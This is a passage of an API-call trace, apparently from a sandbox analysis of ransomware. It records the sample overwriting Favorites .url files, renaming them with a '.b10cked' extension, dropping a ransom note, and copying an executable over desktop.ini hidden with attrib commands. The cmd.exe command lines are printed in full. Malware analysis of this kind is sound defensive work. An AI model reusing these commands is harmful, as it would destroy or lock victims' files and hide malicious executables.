[0213.463] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0213.464] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x134, dwThreadId=0xa80)) returned 1 [0213.469] CloseHandle (hObject=0x1b4) returned 1 [0213.469] CloseHandle (hObject=0x120) returned 1 [0213.470] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.470] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.470] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount1=46, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount2=46) returned 2 [0213.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.470] ReleaseMutex (hMutex=0xf8) returned 1 [0213.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 
0x0 [0213.470] ReleaseMutex (hMutex=0xf8) returned 1 [0213.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.470] ReleaseMutex (hMutex=0xf8) returned 1 [0213.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.470] ReleaseMutex (hMutex=0xf8) returned 1 [0213.470] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27032215702) returned 1 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) 
returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.535] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.535] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.536] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.536] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.536] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 
[0213.536] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.536] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.536] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Autos.url", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0213.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Autos.url", cchWideChar=13, lpMultiByteStr=0x13131ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Autos.url", lpUsedDefaultChar=0x0) returned 13 [0213.540] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0213.540] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0213.540] CloseHandle (hObject=0x120) returned 1 [0213.541] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL") returned 0x2f [0213.541] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0213.542] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9b0, dwThreadId=0xa94)) returned 1 [0213.551] CloseHandle (hObject=0x1b4) returned 1 [0213.551] CloseHandle (hObject=0x120) returned 1 [0213.551] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0213.551] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.551] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount1=40, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount2=46) returned 3 [0213.551] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0213.551] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", 
cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0213.551] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount1=40, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0213.551] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0213.551] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0213.551] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0213.551] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0213.552] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0213.552] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0213.552] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), 
lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa54, dwThreadId=0xac0)) returned 1 [0213.557] CloseHandle (hObject=0x1b4) returned 1 [0213.557] CloseHandle (hObject=0x120) returned 1 [0213.557] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\msn websites\\bl0cked-readme.rtf")) returned 0xffffffff [0213.557] GetLastError () returned 0x2 [0213.557] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\msn websites\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0213.560] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\msn websites\\bl0cked-readme.rtf")) returned 0x20 [0213.560] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0213.560] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0213.560] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0213.560] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0213.560] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 
[0213.561] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0213.561] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0213.561] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0213.561] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0213.561] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0213.561] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1") returned 0x22 [0213.561] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x146 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\DEFAULT\\FAVORI~1\\MSNWEB~1\\DESKTOP.INI\" & 
DEL /F /Q \"C:\\USERS\\DEFAULT\\FAVORI~1\\MSNWEB~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\DEFAULT\\FAVORI~1\\MSNWEB~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\DEFAULT\\FAVORI~1\\MSNWEB~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x146 [0213.561] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0213.561] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xa74, dwThreadId=0x794)) returned 1 [0213.572] WaitForSingleObject (hHandle=0x120, 
dwMilliseconds=0xffffffff) returned 0x0 [0214.584] CloseHandle (hObject=0x120) returned 1 [0214.584] CloseHandle (hObject=0x1b4) returned 1 [0214.584] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0214.584] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0214.584] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0214.584] GetTickCount () returned 0x3c17a [0214.584] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=27137337170) returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x5a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 